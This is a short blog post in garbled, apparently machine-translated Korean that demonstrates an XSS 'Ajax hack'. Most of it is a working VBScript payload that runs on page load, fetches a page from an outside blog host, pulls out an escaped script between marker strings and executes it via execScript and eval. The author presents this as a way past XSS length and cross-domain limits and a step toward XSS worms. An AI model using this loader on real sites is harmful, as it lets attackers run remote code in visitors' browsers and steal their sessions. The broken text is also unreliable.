재 미 있 는 Ajax Hack 시범

오늘 꿈 의 빛 BLOG 에서 Ajax 를 봤 어 요. Hack 시범,사실 크로스 오 버 발견 은 쉽 지만 큰 해 를 끼 치 는 것 은 어렵 습 니 다.몰래 COOKIE 같은 것 은 사용자 만 을 대상 으로 합 니 다.XSS WORM 의 그런 이용 이 야 말로 무 서운 것 이다.그의 VBSCRIPT 스 크 립 트 를 살 펴 보 자

vbscript:execute("  
dim l,s:  
l=chr(13)+chr(10):  
s=""sub mycode""&l:  
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:  
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:  
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:  
s=s&""http.open """"get"""",url,false""&l:  
s=s&""http.send("""""""")""&l:  
s=s&""pg=http.responseText""&l:  
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:  
s=s&""if p=null or p<1 then exit sub""&l:  
s=s&""p=instr(p,pg,chr(37))""&l:  
s=s&""if p=null or p<1 then exit sub""&l:  
s=s&""p2=instr(p,pg,chr(60))""&l:  
s=s&""cd=mid(pg,p,p2-p)""&l:  
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:  
s=s&""window.execScript ht,""""jscript""""""&l:  
s=s&""end sub""&l:  
execute(s):  
document.body.onload=getref(""mycode""):  
") 

호출 코드 는 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html 이렇게 해서 본 사이트 의 호출 코드 를 실현 하고 생각 을 바 꾸 었 습 니 다.이것 이 Ajax 를 해결 하 는 것 입 니까? Hack 이 자주 사용 하 는 제출 데이터 제한(역 외 제출 권한 없 음,XSS 코드 길이 제한)문제 입 니 다.ㅎ ㅎ~여기 도 실험 이 없습니다.또 하나의 아 이 디 어 는 검 심의 조각 을 나 누 어 스 크 립 트 를 쓰 고 eval 나 오 는 것 입 니 다.이 두 가지 아 이 디 어 를 결합 하면 우 리 는 가혹 한 XSS 구멍 에서 기적 을 창조 할 수 있 을 것 입 니 다!